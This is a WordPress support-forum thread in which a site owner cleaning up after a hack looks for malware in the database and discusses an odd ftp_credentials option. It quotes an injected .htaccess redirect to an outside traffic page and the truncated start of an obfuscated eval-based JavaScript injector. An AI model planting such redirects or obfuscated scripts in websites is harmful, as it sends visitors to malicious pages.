Malware in DB – how to identify

The back door might not be in the database but hidden in your uploads folder. See https://ottopress.com/2009/hacked-wordpress-backdoors/

Thanks for your reply. Sadly, my upload dir is clean as water. All years. Each month… I have checked everything. It has to be something in the database.

Have you spoken to your hosts? This could be a server security issue – not a WP one – especially since the root .htaccess was targeted.

Yes, I have spoken to them, but they are not willing to take any responsibility.
By the way, the code inserted into my .htaccess and my themes header are easy to find, it always start with: #336988# with the code between and ends with a trailing slash.
In htaccess this entry is cleared: RewriteRule ^(.*)$ https://digitalphoto-art.it/traf.php [R=301,L]

The malware code in the header template is a php ecoing a javascript which starts like this: dbshre=220;try{window.document.body*=2}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement(\"div\");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(31,94,11 etc etc.

I have spoken to them, but they are not willing to take any responsibility.

Time to change hosts, perhaps? Have you changed all of your ftp and hosting account management passwords in case you had an ftp leak?

From what you describe above, I can’t see how anything in the database could be responsible for this. It really does smack of a compromised server but just to be on the safe side, so you have any pre-hack database backups?

Yes, I do have an old DB backup, but I miss of course some entries in it. And yes, I have changed all passwords – everything.

After googling myself to death I have found somthing that might be a very, very odd row in my OPTIONS table:

SELECT *
FROM <code>my_damn_database</code>.<code>my_damn_database_options</code>
WHERE (
CONVERT( <code>option_id</code>
USING utf8 ) LIKE 'ftp_credentials'
OR CONVERT( <code>option_name</code>
USING utf8 ) LIKE 'ftp_credentials'
OR CONVERT( <code>option_value</code>
USING utf8 ) LIKE 'ftp_credentials'
OR CONVERT( <code>autoload</code>
USING utf8 ) LIKE 'ftp_credentials'
)
LIMIT 0 , 30

Should I delete this row? Now?

The information wordpress need in order to update plugins, themes and core are stored in the wp-config. The information I found in my DB (Options-table) (the row with ftp_credentials) is actually the complete information needed to get full ftp access to my server…! This cannot be a standard wordpress insert?

This cannot be a standard wordpress insert?

I’ve never looked myself as FTP is a horrible protocol for me but if you can setup a second instance of WordPress with a separate table prefix (so you don’t use the old installation) you can easily check.

Can I just clarify that this was an option called ftp_credentials in the wp_option table? Just checked a couple of my sites & there’s nothing like this in the databases.

Yes, Esmi. In the OPTIONS table I have a row with option_name: ftp_credentials

The value is (almost – but it is straight forward the real ftp address and the real ftp login name and yes, it is marked autoload YES):
a:3:{s:8:"hostname";s:14:"webnumber51.theserver.com";s:8:"username";s:5:"the-real-username";s:15:"connection_type";s:3:"ftp";}

I wonder if this came from a plugin? It’s definitely not in any of the the databases that I’ve looked at.

[EDIT: I’ve asked for some more eyes on this.]

Yes…because, it might be easy just to query the db and get this very, very important information…

Do you use filezilla client?

That ftp client store without encriptiom all data so if you have a Trojan in you PC, someone can access all your username, password and website.

No, José, I am using another FTP client, and yes, I have recently found a trojan on my PC and killed it. I have not checked if this client stores the login information un-encrypted as Filezilla does (as a very visible text file).
But still: The table row I found in my options really do look suspicious.